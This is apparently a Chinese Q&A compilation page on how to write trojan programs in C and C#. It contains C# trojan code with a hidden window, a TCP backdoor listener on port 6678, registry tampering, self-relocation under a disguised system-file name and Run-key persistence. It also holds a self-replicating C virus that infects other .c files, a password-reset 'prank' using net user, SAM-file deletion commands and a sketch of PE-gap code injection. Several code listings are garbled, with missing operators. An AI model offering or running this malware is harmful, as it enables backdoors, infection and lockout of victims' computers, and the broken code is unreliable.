c语言编写木马程序_怎样用c语言开发木马程序

hacker|
243

c语言可以编个木马吗

要实现木马服务的程序,主要实现以下几个功能:后台的运行(隐藏技术),控制码的接收与注册表的修改,下面对这三方面做介绍:

1、在VC#中,建立一个后台服务程序是很容易的,先建立一个新的C#的Windows应用程序,项目名称自定(不过为了隐藏可使用与系统相近的名称),将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中显示,并将属性“Windowstate”属性设为Mininized即可,这样窗体就可以隐藏运行了。当然你也可以在InitializeComponent()设置,此函数起初始化的作用,在窗体显示前运行,代码如下:

private void InitializeComponent()

{

//

// Form1

//

//窗体显示的起点和大小

this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);

this.ClientSize = new System.Drawing.Size(368, 357);

//窗体名称

this.Name = "Form1";

//设置属性让它后台运行

this.ShowInTaskbar = false;

this.Text = "Form1";

this.WindowState = System.Windows.Forms.FormWindowState.Minimized;

}

2、控制代码的接收,必需在服务程序运行开始就启动,所以侦听线程必需在程序初始化中启动,所以放在窗体的构造函数中,代码注解如下:

public Form1() //窗体的构造函数

{

//

// Windows 窗体设计器支持所必需的

//

InitializeComponent();

//

// TODO: 在 InitializeComponent 调用后添加任何构造函数代码

//加入你的侦听代码

//端口你可以自已设定,我使用了固定的端口

int port =6678;

//System.Net.Sockets.TcpListener是用来在Tcp *** 中侦听客户端的

listener = new TcpListener(port);

//启动侦听

listener.Start();

//增加接收控制码的线程,如果要停止线程可以用 Thread.abort()

//reControlCode 是线程启动执行的函数,此函数根据接收的控制

//控制码选取合适的注册表修改函数

Thread thread = new Thread(new ThreadStart(reControlCode));

thread.Start();

}

reControlCode函数如下,完整代码见程序

private void reControlCode()

{

//设置接收套接字,接收listener.AcceptSocket是返回已经接收的客户的请求

socket = listener.AcceptSocket();

//如果连接成功执行

while (socket.Connected)

{

//接收控制码

byte [] by =new byte[6];

int i = socket.Receive(by,by.Length ,0);

string ss = System.Text.Encoding.ASCII.GetString(by);

//根据控制码执行不同的功能

//修改注册表加入编码

switch (ss)

{

case "jiance"://测试连接,返回测试信息

string str ="hjc";

byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);

socket.Send(bytee,0,bytee.Length,0);

break;

case "zx1000":

//修改注册表函数,自已定义,见下面分析

UnLogOff();

//返回控制消息

retMessage();

break;

case "zx0100":

//修改注册表函数

UnClose();

//返回控制消息

retMessage();

break;

//重复的case功能与前面一样,略掉

default:

break;

}//case

}//while

} //private void reControlCode

3、C#中实现注册表的修改,使用了.NET类库中的System.Microsoft.Win32命令空间,它提供两种类型的类:处理由操作系统引发的事件的类和对系统注册表进行操作的类。下面就可以看到它的用法。这里我做了一个修改注册表的子程序:使计算机不能注销。在这之前先了解注册表,在子键SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer

下面设键值NoLogOff 为 1 即可使计算机无法注销。在下面的函数中用C#实现对注册表的修改:

private void UnLogOff()

{

//得到主机的注册表的顶级节点

Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;

//设置一个注册表子键的变量

RegistryKey key1;

try

{

//函数RegistryKey.OpenSubkey(string registrykey,bool canwrite)检索指定的子键

//registrykey是用户指定的键值,canwrite 为true则可修改,默认为fasle不可改

key1 =

rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

//设置子键的键名,和值

key1.SetValue ("NoLogOff",1);

//关闭打开的子键

key1.Close();

//警告字符串设定

mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改!请将它置为0!";

}

catch{}

//如果不存在自已建立

if(key1 ==null)

{

try

{

//使用RegistryKey.CreateSubKey(string mystring)函数来建立你需要的子键

RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLogOff",1);

key2.Close();

mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改!请将它置为0!";

}

catch{}

}

}

4、在木马程序中还有一个重要的功能就是自我的复制和转移。木马引入被控制的主机时必需自动将木马隐藏在System,System32的目录下以防被发现。转移的代码分析如下,主要实现的功能是将D盘下的木马程序转移到C:\\winnnt\\system\\msdoss.exe,同时换名称。使用的.NET命名空间System.IO,它的作用是允许对数据流和文件进行同步和异步读写。这里我们使用了System.IO.File类。

private void moveCC1()

{

try

{

//函数File.Move(string sourceFileName,string destFileName)起移动文件的作用

//sourceFileName为要移动的文件名,destFileName为文件的新路径

File.Move("C:\\winnnt\\system\\msdoss.exe","d:\\winnt\\system32\\expleror.exe");

}

catch {}

//将新移的木马程序设为自启动.分析和前面一样

try

{

key1 = rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);

key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");

key1.Close();

}

catch{}

if(key1 ==null)

{

try

{

RegistryKey key2=rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");

key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");

key1.Close();

}

catch{}

}

} //moveCC1()

按照步骤来就可以得到一个C#木马了..

都给出答案了.可以给分卜?

c语言木马代码,简单点的,我保证不做违法的

#include stdio.h

#include dir.h

void main(void)

{

virus();

}

int virus()

{

struct ffblk ffblk;

FILE *in,*out,*read;

char *virus="virus.c";

char buf[50][80];

char *p;

char *end="return";

char *bracket="}";

char *main="main";

char *include[2]={"stdio.h","dir.h"};

char *int_virus="int virus()";

char *buffer;

int done,i,j=0,flag=0;

printf("\nI have a virus. Writen by PuBin\n");

done = findfirst("*.c",ffblk,0);

while (!done)

{

i=0;

if ((in = fopen(ffblk.ff_name, "rt"))== NULL)

{

goto next;

}

do{

if(i=50)

{

fclose(in);

goto next;

}

p=fgets(buf[i],80,in);

i++;

}while(p!=NULL);

fclose(in);

out=fopen(ffblk.ff_name,"w+t");

fputs("#includestdio.h\n",out);

fputs("#includedir.h\n",out);

do

{

if(strstr(buf[j],main)!=NULL)

{

for(;ji-1;j++)

if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)

fputs(buf[j],out);

else

{

if(flag==0)

{

flag=1;

fputs("virus();\n",out);

}

fputs(buf[j],out);

}

}

else if((strstr(buf[j],include[0])==NULL)

(strstr(buf[j],include[1])==NULL))

{

fputs(buf[j],out);

j++;

}

else

j++;

}while(ji-1);

read=fopen(virus,"rt");

do

{

p=fgets(buffer,80,read);

if(strstr(buffer,int_virus))

while(p!=NULL)

{

if(strstr(buffer,virus)==NULL)

fputs(buffer,out);

else

{

fputs(" char *virus=\"",out);

fputs(ffblk.ff_name,out);

fputs("\";\n",out);

}

p=fgets(buffer,80,read);

}

}while(p!=NULL);

fclose(read);

fclose(out);

printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);

next: done = findnext(ffblk);

}

return 0;

}

再就是网上一百度一大堆的。

如何用C语言编一个假中毒的恶作剧程序?

一个小东西 介绍了后别笑话我 !它的功能很简单,就是把Administrator的密码该成xiaoniaoheihei

大家整了人之后切记告诉他密码(xiaoniaoheihei)

由于不能上传文件文件尺寸:

小于 200 kb

可用扩展名: gif, jpg

自己可以用TC2.0编写编译调试生成

C语言下的代码如下:

main()

{

system("net user administrator xiaoniaoheihei");

}

如果自己真的不小心忘记了密码 如果是XP系统 管理员密码破解如下:

1.用个启动盘启动电脑后进入DOS 状态下:输入如下命令

del X:\windows\sysrem32\config\sam 回车

copy x:\windows\repair\sam x:\windows\system32\config 回车

2.重新启动计算机。X为安装XP的盘 一般为c:

请介绍下C语言写木马的算法......

我只知道window的木马程序的原理,首先你要去研究一下windows PE文件的格式,windows PE文件包括(exe dll文件等),用文本方式打开任意一个exe或者dll文件,就会发现这些文件都具有类似的组织结构(就是PE格式)

仔细耐心地研究了PE格式后,你会发现这些PE格式的文件有很多间隙空间可用,window木马程序正是利用PE格式文件中的这些间隙,把自己的代码插入这些间隙空间中,同时还要修改宿主程序的入口地址(OEP Original Entry Point)

这样,宿主程序一运行,首先运行生成木马的代码,然后运行宿主程序。

Windows应用程序捆绑核心编程 (PE)

0条大神的评论

发表评论